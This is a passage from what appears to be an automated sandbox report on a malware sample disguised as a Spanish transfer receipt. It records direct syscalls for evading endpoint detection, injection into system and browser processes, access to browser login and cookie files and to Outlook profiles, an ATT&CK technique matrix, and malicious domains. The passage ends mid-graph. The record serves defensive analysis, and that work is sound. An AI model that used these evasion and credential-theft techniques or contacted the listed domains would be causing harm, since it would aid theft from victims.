            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F172 mov eax, dword ptr fs:[00000030h]6_2_3699F172
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A75152 mov eax, dword ptr fs:[00000030h]6_2_36A75152
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2DEAA mov eax, dword ptr fs:[00000030h]6_2_36A2DEAA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A7E96 mov eax, dword ptr fs:[00000030h]6_2_369A7E96
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D3E8F mov eax, dword ptr fs:[00000030h]6_2_369D3E8F
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4DEB0 mov eax, dword ptr fs:[00000030h]6_2_36A4DEB0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4DEB0 mov ecx, dword ptr fs:[00000030h]6_2_36A4DEB0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4DEB0 mov eax, dword ptr fs:[00000030h]6_2_36A4DEB0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4DEB0 mov eax, dword ptr fs:[00000030h]6_2_36A4DEB0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4DEB0 mov eax, dword ptr fs:[00000030h]6_2_36A4DEB0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5DEB0 mov eax, dword ptr fs:[00000030h]6_2_36A5DEB0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2DE9B mov eax, dword ptr fs:[00000030h]6_2_36A2DE9B
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699FEA0 mov eax, dword ptr fs:[00000030h]6_2_3699FEA0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699DEA5 mov eax, dword ptr fs:[00000030h]6_2_3699DEA5
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699DEA5 mov ecx, dword ptr fs:[00000030h]6_2_3699DEA5
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A6BEE6 mov eax, dword ptr fs:[00000030h]6_2_36A6BEE6
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A6BEE6 mov eax, dword ptr fs:[00000030h]6_2_36A6BEE6
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A6BEE6 mov eax, dword ptr fs:[00000030h]6_2_36A6BEE6
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A6BEE6 mov eax, dword ptr fs:[00000030h]6_2_36A6BEE6
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699BEC0 mov eax, dword ptr fs:[00000030h]6_2_3699BEC0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699BEC0 mov eax, dword ptr fs:[00000030h]6_2_3699BEC0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369ABEC0 mov eax, dword ptr fs:[00000030h]6_2_369ABEC0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369ABEC0 mov eax, dword ptr fs:[00000030h]6_2_369ABEC0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369ABEC0 mov eax, dword ptr fs:[00000030h]6_2_369ABEC0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369ABEC0 mov eax, dword ptr fs:[00000030h]6_2_369ABEC0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369ABEC0 mov eax, dword ptr fs:[00000030h]6_2_369ABEC0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369ABEC0 mov eax, dword ptr fs:[00000030h]6_2_369ABEC0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369ABEC0 mov eax, dword ptr fs:[00000030h]6_2_369ABEC0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369ABEC0 mov eax, dword ptr fs:[00000030h]6_2_369ABEC0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CFEC0 mov eax, dword ptr fs:[00000030h]6_2_369CFEC0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2FEC5 mov eax, dword ptr fs:[00000030h]6_2_36A2FEC5
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A3EF4 mov eax, dword ptr fs:[00000030h]6_2_369A3EF4
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A3EF4 mov eax, dword ptr fs:[00000030h]6_2_369A3EF4
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A3EF4 mov eax, dword ptr fs:[00000030h]6_2_369A3EF4
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D3EEB mov ecx, dword ptr fs:[00000030h]6_2_369D3EEB
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D3EEB mov eax, dword ptr fs:[00000030h]6_2_369D3EEB
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D3EEB mov eax, dword ptr fs:[00000030h]6_2_369D3EEB
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A59EDF mov eax, dword ptr fs:[00000030h]6_2_36A59EDF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A59EDF mov eax, dword ptr fs:[00000030h]6_2_36A59EDF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A3EE1 mov eax, dword ptr fs:[00000030h]6_2_369A3EE1
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699DE10 mov eax, dword ptr fs:[00000030h]6_2_3699DE10
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369DBE17 mov eax, dword ptr fs:[00000030h]6_2_369DBE17
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A75E37 mov eax, dword ptr fs:[00000030h]6_2_36A75E37
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A75E37 mov eax, dword ptr fs:[00000030h]6_2_36A75E37
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A75E37 mov eax, dword ptr fs:[00000030h]6_2_36A75E37
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A1E30 mov eax, dword ptr fs:[00000030h]6_2_369A1E30
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A1E30 mov eax, dword ptr fs:[00000030h]6_2_369A1E30
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369BDE2D mov eax, dword ptr fs:[00000030h]6_2_369BDE2D
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369BDE2D mov eax, dword ptr fs:[00000030h]6_2_369BDE2D
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369BDE2D mov eax, dword ptr fs:[00000030h]6_2_369BDE2D
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A73E10 mov eax, dword ptr fs:[00000030h]6_2_36A73E10
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A73E10 mov eax, dword ptr fs:[00000030h]6_2_36A73E10
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369DBE51 mov eax, dword ptr fs:[00000030h]6_2_369DBE51
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369DBE51 mov eax, dword ptr fs:[00000030h]6_2_369DBE51
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B5E40 mov eax, dword ptr fs:[00000030h]6_2_369B5E40
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699BE78 mov ecx, dword ptr fs:[00000030h]6_2_3699BE78
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5DE46 mov eax, dword ptr fs:[00000030h]6_2_36A5DE46
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A49E56 mov ecx, dword ptr fs:[00000030h]6_2_36A49E56
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1F92 mov ecx, dword ptr fs:[00000030h]6_2_369B1F92
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1F92 mov ecx, dword ptr fs:[00000030h]6_2_369B1F92
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1F92 mov eax, dword ptr fs:[00000030h]6_2_369B1F92
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1F92 mov ecx, dword ptr fs:[00000030h]6_2_369B1F92
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1F92 mov ecx, dword ptr fs:[00000030h]6_2_369B1F92
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1F92 mov eax, dword ptr fs:[00000030h]6_2_369B1F92
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1F92 mov ecx, dword ptr fs:[00000030h]6_2_369B1F92
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1F92 mov ecx, dword ptr fs:[00000030h]6_2_369B1F92
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1F92 mov eax, dword ptr fs:[00000030h]6_2_369B1F92
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1F92 mov ecx, dword ptr fs:[00000030h]6_2_369B1F92
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1F92 mov ecx, dword ptr fs:[00000030h]6_2_369B1F92
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B1F92 mov eax, dword ptr fs:[00000030h]6_2_369B1F92
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699FF90 mov edi, dword ptr fs:[00000030h]6_2_3699FF90
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369E1FB8 mov eax, dword ptr fs:[00000030h]6_2_369E1FB8
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369DBFB0 mov eax, dword ptr fs:[00000030h]6_2_369DBFB0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A43F90 mov eax, dword ptr fs:[00000030h]6_2_36A43F90
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A43F90 mov eax, dword ptr fs:[00000030h]6_2_36A43F90
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699BFD0 mov eax, dword ptr fs:[00000030h]6_2_3699BFD0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D1FCD mov eax, dword ptr fs:[00000030h]6_2_369D1FCD
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D1FCD mov eax, dword ptr fs:[00000030h]6_2_369D1FCD
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D1FCD mov eax, dword ptr fs:[00000030h]6_2_369D1FCD
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A3FC2 mov eax, dword ptr fs:[00000030h]6_2_369A3FC2
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5BFC0 mov ecx, dword ptr fs:[00000030h]6_2_36A5BFC0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5BFC0 mov eax, dword ptr fs:[00000030h]6_2_36A5BFC0

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtProtectVirtualMemory: Direct from: 0x77667B2EJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtAllocateVirtualMemory: Direct from: 0x77672BECJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtClose: Direct from: 0x77672B6C
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtAllocateVirtualMemory: Direct from: 0x77673C9CJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: NULL target: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeSection loaded: NULL target: C:\Windows\SysWOW64\icsunattend.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: NULL target: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: NULL target: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeThread register set: target process: 5732Jump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeThread APC queued: target process: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeJump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeProcess created: C:\Users\user\Desktop\justificante de transferencia09454545.exe "C:\Users\user\Desktop\justificante de transferencia09454545.exe"Jump to behavior
            Source: C:\Program Files (x86)\MUNIQiOLOVRjqEipmSYNBiFRuGzhIhMToVbKukDDhfmJkf\Ll3N65UXbvloyqJVc8Qu.exeProcess created: C:\Windows\SysWOW64\icsunattend.exe "C:\Windows\SysWOW64\icsunattend.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 1_2_00405EBF GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,1_2_00405EBF

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000000A.00000002.3871614369.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3868536382.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3869133964.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3424297111.0000000036610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3869289040.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3424665808.00000000376C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3870609350.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\icsunattend.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000000A.00000002.3871614369.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3868536382.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3869133964.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3424297111.0000000036610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3869289040.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3424665808.00000000376C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3870609350.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            311
            Process Injection
            1
            Masquerading
            1
            OS Credential Dumping
            221
            Security Software Discovery
            Remote Services1
            Email Collection
            11
            Encrypted Channel
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism
            2
            Virtualization/Sandbox Evasion
            LSASS Memory2
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            311
            Process Injection
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information
            NTDS2
            File and Directory Discovery
            Distributed Component Object Model1
            Clipboard Data
            5
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Abuse Elevation Control Mechanism
            LSA Secrets24
            System Information Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1630919 Sample: justificante de transferenc... Startdate: 06/03/2025 Architecture: WINDOWS Score: 100 31 www.meacci.xyz 2->31 33 www.kdjsswzx.club 2->33 35 4 other IPs or domains 2->35 49 Suricata IDS alerts for network traffic 2->49 51 Antivirus detection for URL or domain 2->51 53 Antivirus / Scanner detection for submitted sample 2->53 57 6 other signatures 2->57 10 justificante de transferencia09454545.exe 2 38 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 31->55 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 10->29 dropped 13 justificante de transferencia09454545.exe 6 10->13         started        process6 dnsIp7 43 drive.google.com 142.250.186.78, 443, 49707 GOOGLEUS United States 13->43 45 drive.usercontent.google.com 172.217.16.193, 443, 49708 GOOGLEUS United States 13->45 69 Maps a DLL or memory area into another process 13->69 17 Ll3N65UXbvloyqJVc8Qu.exe 13->17 injected signatures8 process9 signatures10 47 Found direct / indirect Syscall (likely to bypass EDR) 17->47 20 icsunattend.exe 13 17->20         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 20->59 61 Tries to harvest and steal browser information (history, passwords, etc) 20->61 63 Modifies the context of a thread in another process (thread injection) 20->63 65 3 other signatures 20->65 23 